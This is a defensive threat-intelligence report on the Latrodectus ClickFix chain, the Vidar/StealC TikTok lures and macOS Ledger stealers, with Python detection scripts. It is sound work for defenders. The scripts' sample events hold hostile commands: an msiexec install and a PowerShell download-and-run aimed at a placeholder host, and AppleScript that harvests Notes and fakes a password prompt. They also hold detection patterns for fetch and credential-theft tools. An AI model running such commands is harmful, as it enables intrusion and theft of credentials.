Full Report
The malware known as Latrodectus has become the latest to embrace the widely-used social engineering technique called ClickFix as a distribution vector. "The ClickFix technique is particularly risky because it allows the malware to execute in memory rather than being written to disk," Expel said in a report shared with The Hacker News. "This removes many opportunities for browsers or security
Analysis Summary
# Tool/Technique: Latrodectus
## Overview
Latrodectus is a malware family primarily functioning as a downloader for subsequent malicious payloads, such as ransomware. It gained attention for utilizing the "ClickFix" social engineering technique for distribution, which often involves in-memory execution to evade disk-based detection.
## Technical Details
- Type: Malware family
- Platform: Windows (Inferred, based on use of PowerShell and MSIExec)
- Capabilities: Payload delivery, in-memory execution, DLL sideloading through a legitimate NVIDIA installer bundled in the MSI package it fetches.
- First Seen: Publicly documented in April 2024 by Proofpoint and Team Cymru.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1189 - Drive-by Compromise (the ClickFix lure is served from compromised websites)
- T1566.002 - Phishing: Spearphishing Link (where the link to the lure page arrives by email; note that T1566.004 is "Spearphishing Voice", not "Spearphishing Link")
- TA0002 - Execution
- T1204.004 - User Execution: Malicious Copy and Paste (the victim pastes and runs the command themselves)
- T1059.001 - Command and Scripting Interpreter: PowerShell
- TA0005 - Defense Evasion
- T1218.007 - System Binary Proxy Execution: Msiexec (T1218.011 is Rundll32; the parent technique was renamed from "Signed Binary Proxy Execution")
- T1574.002 - Hijack Execution Flow: DLL Side-Loading (malicious DLL loaded by the legitimate NVIDIA binary)
## Functionality
### Core Capabilities
- Acts as a downloader for more significant malware like ransomware.
- Leverages the ClickFix social engineering technique.
- Instructs users, typically via a compromised website, to copy and execute a malicious PowerShell command.
- That command runs `msiexec /i <URL>`, so the Windows Installer itself fetches and installs an MSI package from attacker infrastructure.
- Later stages execute in memory rather than being written to disk as a standalone, scannable file.
### Advanced Features
- The MSI package bundles a legitimate NVIDIA application; launching it sideloads a malicious DLL placed alongside it, so the first malicious code runs under a trusted vendor binary.
- The sideloaded stage then downloads the main Latrodectus payload using `curl`.
## Indicators of Compromise
- File Hashes: N/A (not provided in the source)
- File Names: N/A (not provided in the source)
- Registry Keys: N/A (no persistence keys documented; the registry edit referenced under Mitigation is a defensive setting, not an indicator)
- Network Indicators: N/A (C2 and staging URLs not provided)
- Behavioral Indicators: `explorer.exe` spawning `powershell.exe` with a command line the user pasted from a web page; `msiexec.exe` installing a package from an HTTP(S) URL; a legitimate NVIDIA executable loading an unexpected DLL from its own directory; `curl.exe` downloading a payload from within that process tree.
## Associated Threat Actors
- Associated with actors impacted by Operation Endgame, which also targeted QakBot, TrickBot, Bumblebee, HijackLoader, and DanaBot. (Specific named actor affiliation not given, only association through Operation Endgame takedown.)
## Detection Methods
- Signature-based detection: Weak for this chain. The pasted command and the later stages never need to exist on disk as a scannable file, and the stage that does touch disk is a legitimate vendor installer.
- Behavioral detection: Alert on `explorer.exe` (the parent of anything launched from the Run dialog) spawning `powershell.exe`, `mshta.exe` or `cmd.exe` with a long, encoded or URL-bearing command line; on `msiexec.exe` whose package path starts with `http://` or `https://`; and on a vendor binary loading a DLL from a user-writable directory followed by `curl.exe` activity. PowerShell Script Block Logging (Event ID 4104) records the decoded command even when `-EncodedCommand` is used.
- YARA rules: N/A
## Mitigation Strategies
- Remove the Run dialog with the Group Policy "Remove Run menu from Start Menu" (User Configuration > Administrative Templates > Start Menu and Taskbar); this also disables the Win+R hotkey.
- Equivalently, set the `NoRun` value under `HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`, or disable Windows-key shortcuts with `NoWinKeys` in the same key. Caveat: ClickFix variants also instruct victims to paste into a terminal or the File Explorer address bar, so this closes only the most common path.
- Endpoint protection that can inspect and block PowerShell execution chains even when the parent is a user-driven process such as `explorer.exe`; enable Script Block Logging and, where feasible, Constrained Language Mode.
## Related Tools/Techniques
- ClickFix (Social engineering distribution technique)
- IcedID (Latrodectus is believed to be a successor)
- MSIExec (Used for sideloading/initial installation)
---
# Tool/Technique: ClickFix Technique (Social Engineering Vector)
## Overview
The ClickFix technique involves deceiving users into manually copying and executing specific commands (often PowerShell commands) presented on a compromised website. Its primary risk lies in facilitating in-memory execution, bypassing traditional disk-based security checks.
## Technical Details
- Type: Technique
- Platform: General (Platform dependent on the command executed, primarily Windows observed here)
- Capabilities: Social engineering, initial access, facilitating in-memory execution, evading disk-based security, often used with video guidance (e.g., TikTok).
- First Seen: 2024; now in widespread use across many malware families, Latrodectus among them.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1189 - Drive-by Compromise (lure served from a compromised or attacker-controlled website)
- T1566.002 - Phishing: Spearphishing Link (when the link to that page arrives by email or message; T1566.004 is Spearphishing Voice)
- TA0002 - Execution
- T1204.004 - User Execution: Malicious Copy and Paste (the defining step of ClickFix)
- T1059.001 - Command and Scripting Interpreter: PowerShell
## Functionality
### Core Capabilities
- Tricking users via visual or textual cues (sometimes in videos) into manually opening the Windows Run dialog (`Win+R`).
- Guiding users to launch PowerShell and paste and execute a command the attacker prepared.
- Effective because the victim performs the execution step themselves, so there is no exploit, macro or attachment for a control to block, and the pretext (a CAPTCHA, a broken page, a software activation "fix") looks routine.
### Advanced Features
- Escalation observed via using trending social media platforms like TikTok, often with AI-generated narrative content, to guide victims through the process.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: N/A
- Behavioral Indicators: `Win+R` itself generates no event; what is observable is `explorer.exe` spawning `powershell.exe` (or `mshta.exe`, `cmd.exe`) with a long, encoded or URL-bearing command line, typically within seconds of browser activity on the lure page.
## Associated Threat Actors
- Threat actors distributing Latrodectus.
- Threat actors distributing Vidar and StealC (via the TikTok campaign).
## Detection Methods
- Signature-based detection: Limited, because the initial step is a user-intended Run dialog or console command, and the command text is trivially re-obfuscated.
- Behavioral detection: Monitoring for `explorer.exe` as the parent of `powershell.exe` with long, encoded or URL-bearing arguments (the process-tree footprint of `Win+R`), especially on hosts whose users do not normally run PowerShell; PowerShell Script Block Logging (Event ID 4104) records the decoded content regardless of encoding.
- YARA rules: N/A
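The Latrodectus and ClickFix detection notes above describe the same process-tree footprint. The following is an added example, not code from Expel or the source article, that scores constructed Sysmon-style process-creation events for that footprint: it expands `-EncodedCommand` so indicators hidden in base64 become visible, weights a user-driven parent (`explorer.exe`) and a `msiexec /i http...` install, and extracts the URLs for blocking. Field names follow Sysmon Event ID 1 (`Image`, `ParentImage`, `CommandLine`); the parent list, weights and threshold are assumptions to tune, and `example.invalid` is a reserved placeholder, not real infrastructure.

```python
"""Heuristic triage of process-creation events for the ClickFix -> PowerShell -> msiexec
chain. Added example; the events below are constructed, not real telemetry."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Parents that mean a human typed or pasted the command: the Run dialog's child is
# spawned by explorer.exe, and a paste into an open console shows the console as parent.
# Assumption: a starting list for the example, not an exhaustive one.
USER_DRIVEN_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe", "conhost.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# (pattern over the lower-cased command line, weight, reason). Weights are illustrative.
INDICATORS = [
    (r"\b(?:iex|invoke-expression)\b", 3, "in-memory execution via IEX"),
    (r"\b(?:iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl(?:\.exe)?|certutil)\b",
     2, "remote fetch"),
    (r"\bmsiexec(?:\.exe)?\b.*?[/-](?:i|package)\s+https?://", 4, "msiexec installing a package from a URL"),
    (r"-(?:w|windowstyle)\s+hidden", 1, "hidden window"),
    (r"-(?:nop|noprofile)\b", 1, "profile suppressed"),
    (r"-(?:ep|executionpolicy)\s+bypass", 1, "execution policy bypass"),
    (r"https?://", 1, "URL on the command line"),
]
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
ALERT_THRESHOLD = 5  # assumption: tune against your own baseline


def decode_encoded_command(cmdline: str) -> str:
    """Replace '-EncodedCommand <base64 of UTF-16LE>' with its plaintext so the
    indicator patterns see what PowerShell will actually run."""
    def expand(m):
        try:
            return base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)  # not valid PowerShell encoding; leave it untouched
    return ENCODED_RE.sub(expand, cmdline)


@dataclass
class Finding:
    image: str
    parent: str
    score: int = 0
    reasons: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)


def analyze_event(ev: dict) -> Optional[Finding]:
    """Score one process-creation event; non-interpreter processes return None."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in INTERPRETERS:
        return None
    cmd = decode_encoded_command(ev.get("CommandLine", ""))
    finding = Finding(image=image, parent=parent, urls=URL_RE.findall(cmd))
    if parent in USER_DRIVEN_PARENTS:
        finding.score += 2
        finding.reasons.append(f"user-driven parent {parent}")
    lowered = cmd.lower()
    for pattern, weight, reason in INDICATORS:
        if re.search(pattern, lowered):
            finding.score += weight
            finding.reasons.append(reason)
    return finding


def triage(events: List[dict]) -> List[Finding]:
    """Return the findings that reach the alert threshold, in input order."""
    results = (analyze_event(ev) for ev in events)
    return [f for f in results if f is not None and f.score >= ALERT_THRESHOLD]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# Constructed sample events: a plain ClickFix paste, an encoded variant, and a benign script
# launched by a service (svchost.exe parent) that should stay below the threshold.
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": EXPLORER,
     "CommandLine": 'powershell -w hidden -nop -c "msiexec /i http://example.invalid/setup.msi /qn"'},
    {"Image": PS, "ParentImage": EXPLORER,
     "CommandLine": "powershell -enc " + base64.b64encode(
         "iwr http://example.invalid/a.ps1 | iex".encode("utf-16-le")).decode()},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.parent} -> {f.image}: score={f.score} urls={f.urls} reasons={f.reasons}")
```

Running the file prints the two ClickFix-style events (scores 9 and 8) and suppresses the service-launched script. The decode step matters more than the weights: without it the encoded event shows no `iex`, no `iwr` and no URL, which is exactly why Script Block Logging or an equivalent decode belongs in the pipeline.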
## Mitigation Strategies
- Educating users about the danger of copying and pasting commands from untrusted sources, especially those promising free software activation.
- Disabling the Windows Run program or disabling the "Windows + R" hot key via GPO/Registry edits to disrupt the initial execution step.
## Related Tools/Techniques
- Vidar Infostealer (Distributed via TikTok ClickFix variant)
- StealC Infostealer (Distributed via TikTok ClickFix variant)
---
# Tool/Technique: Vidar / StealC (Information Stealers)
## Overview
Vidar and StealC are information stealer malware families that were recently observed being distributed using a sophisticated social engineering campaign leveraging TikTok videos that instructed victims on how to run malicious commands.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Windows (Inferred, based on command execution methods)
- Capabilities: Exfiltrating sensitive data, credentials, and potentially cryptocurrency information from infected systems.
- First Seen: Vidar and StealC are established families (Vidar active since 2018, StealC since early 2023); the TikTok-delivered ClickFix campaign is the recent development.
## MITRE ATT&CK Mapping
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel
- TA0009 - Collection
- T1005 - Data from Local System
## Functionality
### Core Capabilities
- Stealing data stored locally on the compromised machine.
- Exfiltrating collected data to attacker-controlled infrastructure.
### Advanced Features
- Distributed via a novel social engineering vector involving popular media platforms (TikTok), often masked as software activation guides.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: N/A
- Behavioral Indicators: Outbound connections from processes descended from the pasted command (children of `powershell.exe`) to infrastructure the host has not contacted before; reads of browser credential stores, session cookies and cryptocurrency wallet directories by such a freshly spawned process.
## Associated Threat Actors
- Threat actors utilizing popular social media (TikTok) for malware distribution leveraging AI-generated content.
## Detection Methods
- Signature-based detection: Standard detection on the infostealer binaries.
- Behavioral detection: Detection focused on the unusual execution chain leading to the deployment of these stealers.
- YARA rules: N/A
## Mitigation Strategies
- User awareness: a "free activation" or "fix" guide that ends with pasting a command into the Run dialog or PowerShell is the attack itself; the controls listed under ClickFix (Run dialog restriction, PowerShell logging) apply here too.
- Blocking outbound connections from newly spawned processes that should not normally communicate externally, and alerting on access to credential and wallet stores by such processes.
## Related Tools/Techniques
- ClickFix (Distribution vector used for this campaign)
---
# Tool/Technique: macOS Ledger Stealer Campaigns (AMOS/Odyssey)
## Overview
A series of ongoing campaigns targeting macOS users, specifically those using Ledger cryptocurrency hardware wallets, by tricking them into installing trojanized versions of the Ledger Live application to steal seed phrases and other sensitive data.
## Technical Details
- Type: Malware Campaign (Involving multiple stealers)
- Platform: macOS
- Capabilities: Stealing seed phrases from cryptocurrency wallets, exfiltrating passwords and Apple Notes data.
- First Seen: Ongoing since August 2024.
## MITRE ATT&CK Mapping
- TA0009 - Collection
- T1005 - Data from Local System (Collecting seed phrases, passwords)
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- Distributing malicious DMG files impersonating Ledger Live.
- Using AppleScript upon launch to exfiltrate existing passwords and Notes data.
- Downloading and launching a trojanized official Ledger Live application.
- Prompting the user within the fake app to enter their recovery seed phrase under the pretense of fixing an account issue.
### Advanced Features
- Use of established macOS stealer malware like Atomic macOS Stealer (AMOS) and Odyssey.
- Overlap observed with campaigns using PyInstaller-packed binaries for deployment.
## Indicators of Compromise
- File Hashes: N/A
- File Names: Malicious DMG files masquerading as Ledger Live installers.
- Registry Keys: N/A (macOS has no registry; no persistence mechanism is documented for these campaigns)
- Network Indicators: Outbound connection from the fake Ledger Live app to attacker-controlled infrastructure carrying the entered seed phrase (no domains or IPs provided)
- Behavioral Indicators: `osascript` spawned by an application running from a mounted disk image under `/Volumes/` shortly after the DMG is opened, reading the Apple Notes store and password material; an application that then downloads and launches a second Ledger Live binary and prompts for a recovery phrase.
## Associated Threat Actors
- Threat actors specializing in cryptocurrency theft targeting Ledger users.
## Detection Methods
- Signature-based detection: Signatures for known AMOS/Odyssey binaries and the malicious DMGs; weakened by frequent repacking and by the PyInstaller-wrapped variants noted above.
- Behavioral detection: `osascript` executed by a process whose executable lives under `/Volumes/` (run from the DMG, never installed); AppleScript that reads the Notes database or presents a `with hidden answer` password dialog; any application that asks for a 24-word recovery phrase outside the wallet's own onboarding flow.
- YARA rules: N/A
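The behavioral notes above combine two signals: the app runs from a mounted disk image, and its AppleScript reaches for sensitive data. The following is an added example, not code from Moonlock, Ledger or the source article, that applies that two-signal rule to constructed macOS process events. The field names (`path`, `parent_path`, `argv`) are an assumption modelled loosely on EDR process telemetry, and the paths and prompt wording in `SENSITIVE_REFS` are assumptions about common macOS stealer tradecraft rather than details taken from the page.

```python
"""Triage of macOS process events for the trojanized-DMG -> AppleScript collection chain.
Added example; the events below are constructed, not real telemetry."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# An app executing straight from a mounted disk image (/Volumes/<image>/<name>.app) rather
# than from /Applications is typical of a dropper the victim opened but never installed.
MOUNTED_IMAGE_RE = re.compile(r"^/Volumes/[^/]+/.*\.app/")
# Things the AppleScript stage reaches for (assumed tradecraft, matched on lower-cased argv).
SENSITIVE_REFS = [
    (r"group\.com\.apple\.notes|notestore\.sqlite", "Apple Notes database"),
    (r"login\.keychain|security\s+find-(?:generic|internet)-password", "keychain contents"),
    (r"display dialog.*with hidden answer", "password prompt dialog"),
    (r"recovery phrase|seed phrase|secret words", "seed-phrase lure"),
]


@dataclass
class MacFinding:
    verdict: str               # "alert", "review" or "benign"
    parent_path: str
    from_mounted_image: bool
    hits: List[str] = field(default_factory=list)


def analyze_mac_event(ev: dict) -> Optional[MacFinding]:
    """Judge one osascript launch; any other process returns None."""
    if ev["path"].rsplit("/", 1)[-1] != "osascript":
        return None
    parent = ev["parent_path"]
    from_image = bool(MOUNTED_IMAGE_RE.match(parent))
    script = " ".join(ev.get("argv", [])).lower()
    hits = [reason for pattern, reason in SENSITIVE_REFS if re.search(pattern, script)]
    if from_image and hits:
        verdict = "alert"      # both signals: the chain described on this page
    elif from_image or hits:
        verdict = "review"     # one signal, e.g. a legitimate updater asking for a password
    else:
        verdict = "benign"
    return MacFinding(verdict, parent, from_image, hits)


def triage_mac(events: List[dict]) -> List[MacFinding]:
    """Findings for every osascript launch, in input order; other processes are skipped."""
    return [f for f in (analyze_mac_event(ev) for ev in events) if f is not None]


# Constructed sample events; app names and paths are illustrative.
SAMPLE_MAC_EVENTS = [
    # Fake wallet app launched from the DMG, harvesting Notes and phishing the login password.
    {"path": "/usr/bin/osascript",
     "parent_path": "/Volumes/Ledger Live/Ledger Live.app/Contents/MacOS/Ledger Live",
     "argv": ["osascript", "-e",
              'set notesDB to (POSIX path of (path to home folder)) & '
              '"Library/Group Containers/group.com.apple.notes/NoteStore.sqlite"',
              "-e",
              'display dialog "macOS needs your password to continue" default answer "" with hidden answer']},
    # A user running a harmless script from Script Editor.
    {"path": "/usr/bin/osascript",
     "parent_path": "/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor",
     "argv": ["osascript", "-e", 'tell application "Finder" to empty trash']},
    # An installed updater asking for a password: one signal only, worth a look but not an alert.
    {"path": "/usr/bin/osascript",
     "parent_path": "/Applications/Acme Updater.app/Contents/MacOS/Acme Updater",
     "argv": ["osascript", "-e",
              'display dialog "Acme Updater needs your password" default answer "" with hidden answer']},
    # The trojan's own launch from Finder: not osascript, so not judged by this rule.
    {"path": "/Volumes/Ledger Live/Ledger Live.app/Contents/MacOS/Ledger Live",
     "parent_path": "/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder",
     "argv": ["Ledger Live"]},
]

if __name__ == "__main__":
    for f in triage_mac(SAMPLE_MAC_EVENTS):
        print(f"{f.verdict:6} from_image={f.from_mounted_image} hits={f.hits} parent={f.parent_path}")
```

The tiered verdict is the point: a password dialog alone is routine on macOS, and running from a DMG alone is common for portable tools, but the combination is the signature of the campaign. Extend `SENSITIVE_REFS` with your own wallet paths, and feed real events from your EDR once the field mapping is confirmed.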
## Mitigation Strategies
- Only download software from official vendor websites or trusted application stores.
- Never enter seed phrases into any software unless absolutely certain of its legitimacy and context (e.g., initial setup).
## Related Tools/Techniques
- Atomic macOS Stealer (AMOS)
- Odyssey (macOS Stealer)